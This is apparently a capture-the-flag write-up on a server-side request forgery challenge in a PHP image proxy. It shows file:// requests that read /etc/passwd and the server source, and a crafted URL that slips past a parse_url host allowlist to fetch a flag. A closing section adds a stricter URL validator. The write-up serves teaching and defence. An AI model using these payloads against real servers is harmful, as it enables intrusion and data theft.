[Original] KCTF2022 Q1 Challenge 4: 飞蛾扑火 (Moth to the Flame)
2022-5-16 22:41 8161
Topics tested: SSRF & URL bypass
```html
<html>
<head>
<meta charset="utf-8">
<title>欢迎挑战 Design by 香草</title>
</head>
<body>
<!-- phpinfo.php -->
<img src="url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png">
</body>
</html>
```
The page source references phpinfo.php and url.php, which suggests SSRF.

Using the file protocol: http://121.36.145.157:8044/url.php?url=file://127.0.0.1/etc/passwd

This successfully reads passwd.

Next, read url.php itself:

```
curl 'http://121.36.145.157:8044/url.php?url=file://127.0.0.1/var/www/html/url.php'
```

The main logic:
```php
// curl_request() is not shown in this excerpt.
$url = $_GET["url"];
$uu = parse_url($url);
$host = isset($uu["host"])?$uu["host"]:"";
$scheme = isset($uu["scheme"])?$uu["scheme"]:"";
// Only checks that host and scheme are non-empty; the scheme value itself is never validated.
if(empty($host)){
    die("host is null");
}
if(empty($scheme)){
    die("scheme is null");
}

//https://ctf.pediy.com/upload/team/762/team236762.png?
// The host allowlist is applied to parse_url()'s result, but the raw $url is what gets fetched.
if($host=="ctf.pediy.com"||$host=="127.0.0.1"||$host=="localhost"){
//echo curl_request("http://123.57.254.42/flag.php","get",[],true,5);//get flag
    echo curl_request($url,'',"get",[],true,5);
}else{
    die("host not allow");
}
```
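The commented-out line shows the flag is at http://123.57.254.42/flag.php, but the host check only allows ctf.pediy.com, 127.0.0.1 and localhost. So we need to bypass both parse_url and libcurl: the URL must pass the parse_url host check while the actual request reaches 123.57.254.42.

Constructed URL: http://121.36.145.157:8044/url.php?url=123.57.254.42://ctf.pediy.com/../flag.php

This returns the flag: flag{xxx_999()xx*@eeEEE}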
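For the defensive side, here is a stricter check for the same endpoint, as an added example that is not part of the original write-up or the challenge's code. The helper names `validate_fetch_url` and `fetch_validated` are hypothetical, and it assumes the image proxy only ever needs to reach ctf.pediy.com over HTTP(S). It closes both issues shown above: the unvalidated scheme (which allowed `file://` and the numeric "scheme") and passing the raw input to libcurl.

```php
<?php
const ALLOWED_SCHEMES = ['http', 'https'];
const ALLOWED_HOSTS   = ['ctf.pediy.com']; // assumption: the only host the proxy needs

// Hypothetical helper: returns a rebuilt, validated URL, or null if rejected.
function validate_fetch_url(string $url): ?string {
    $p = parse_url($url);
    if (!is_array($p) || !isset($p['scheme'], $p['host'])) {
        return null;
    }
    $scheme = strtolower($p['scheme']);
    $host   = strtolower($p['host']);
    // Allowlist the scheme too: the original only required it to be non-empty.
    if (!in_array($scheme, ALLOWED_SCHEMES, true) || !in_array($host, ALLOWED_HOSTS, true)) {
        return null;
    }
    // Userinfo and explicit ports are not needed here, so refuse them outright.
    if (isset($p['user']) || isset($p['pass']) || isset($p['port'])) {
        return null;
    }
    $path = $p['path'] ?? '/';
    // Refuse "." and ".." path segments, including percent-encoded ones.
    if (preg_match('#(^|/)\.\.?(/|$)#', rawurldecode($path))) {
        return null;
    }
    // Hand curl a URL rebuilt from the checked parts, never the raw input.
    return $scheme . '://' . $host . $path . (isset($p['query']) ? '?' . $p['query'] : '');
}

// Hypothetical helper: fetch with libcurl restricted to HTTP(S) and no redirects.
function fetch_validated(string $safeUrl) {
    $ch = curl_init($safeUrl);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,
        CURLOPT_TIMEOUT         => 5,
    ]);
    return curl_exec($ch);
}

// The three URLs that appear in this write-up, run through the validator only.
foreach ([
    'https://ctf.pediy.com/upload/team/762/team236762.png',
    'file://127.0.0.1/etc/passwd',
    '123.57.254.42://ctf.pediy.com/../flag.php',
] as $u) {
    printf("%-55s => %s\n", $u, validate_fetch_url($u) ?? 'REJECTED');
}
```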